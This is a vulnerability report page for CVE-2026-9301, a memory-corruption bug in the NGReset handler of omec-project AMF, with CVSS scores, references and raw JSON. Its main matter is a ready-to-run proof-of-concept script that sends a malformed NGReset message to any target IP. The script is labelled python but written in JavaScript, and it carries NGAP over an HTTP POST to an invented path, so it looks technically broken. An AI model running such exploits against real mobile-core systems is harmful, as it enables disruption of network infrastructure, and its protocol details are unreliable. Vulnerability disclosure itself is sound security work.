Security Vulnerability Report
中文
CVE-2026-9301 CVSS 6.3 MEDIUM

CVE-2026-9301

Published: 2026-05-23 14:16:44
Last Modified: 2026-05-26 19:50:22

Description

A vulnerability was found in omec-project amf up to 2.1.1. This vulnerability affects unknown code of the component NGReset Message Handler. Performing a manipulation results in memory corruption. The attack is possible to be carried out remotely. The exploit has been made public and could be used. It is recommended to apply a patch to fix this issue.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

omec-project AMF <= 2.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-9301 PoC - NGReset Message Memory Corruption // Target: omec-project AMF < 2.1.1 // Component: NGReset Message Handler const http = require('http'); // Construct malicious NGReset message to trigger memory corruption function constructMaliciousNGReset() { // NGReset Message Type: 0x00C0 const ngResetMsg = Buffer.alloc(128); // Message Header ngResetMsg.writeUInt8(0x00, 0); // Protocol Discriminator ngResetMsg.writeUInt8(0xC0, 1); // Message Type (NGReset) ngResetMsg.writeUInt16BE(0x0001, 2); // Procedure Transaction ID // Trigger memory corruption with malformed NGReset cause ngResetMsg.writeUInt8(0x00, 5); // NGReset Cause - Critical ngResetMsg.writeUInt16BE(0xFFFF, 6); // Malformed cause value // UE Identity List - overflow condition ngResetMsg.writeUInt8(0x01, 8); // Number of UEs ngResetMsg.writeUInt8(0xFF, 9); // AMF Set ID - triggers overflow // Padding with trigger bytes for (let i = 10; i < 128; i++) { ngResetMsg.writeUInt8(0x41, i); // Pattern to identify corruption } return ngResetMsg; } // Send exploit payload to AMF async function exploit(targetIP, targetPort = 38412) { console.log('[*] CVE-2026-9301 Exploit'); console.log(`[*] Target: ${targetIP}:${targetPort}`); const payload = constructMaliciousNGReset(); const options = { hostname: targetIP, port: targetPort, path: '/ngap/ngreset', method: 'POST', headers: { 'Content-Type': 'application/vnd.3gpp.ngap', 'Content-Length': payload.length, 'X-NGAP-MessageType': 'NGReset' } }; const req = http.request(options, (res) => { console.log(`[+] Response Status: ${res.statusCode}`); }); req.write(payload); req.end(); console.log('[+] Malicious NGReset message sent'); console.log('[*] Check AMF service status for memory corruption'); } // Usage: node cve-2026-9301-poc.js <target_ip> const target = process.argv[2] || '127.0.0.1'; exploit(target);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9301", "sourceIdentifier": "[email protected]", "published": "2026-05-23T14:16:43.597", "lastModified": "2026-05-26T19:50:21.747", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in omec-project amf up to 2.1.1. This vulnerability affects unknown code of the component NGReset Message Handler. Performing a manipulation results in memory corruption. The attack is possible to be carried out remotely. The exploit has been made public and could be used. It is recommended to apply a patch to fix this issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}]}], "references": [{"url": "https://github.com/omec-project/amf/", "source": "[email protected]"}, {"url": "https://github.com/omec-project/amf/issues/678", "source": "[email protected]"}, {"url": "https://github.com/omec-project/amf/pull/666", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/811842", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365248", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365248/cti", "source": "[email protected]"}]}}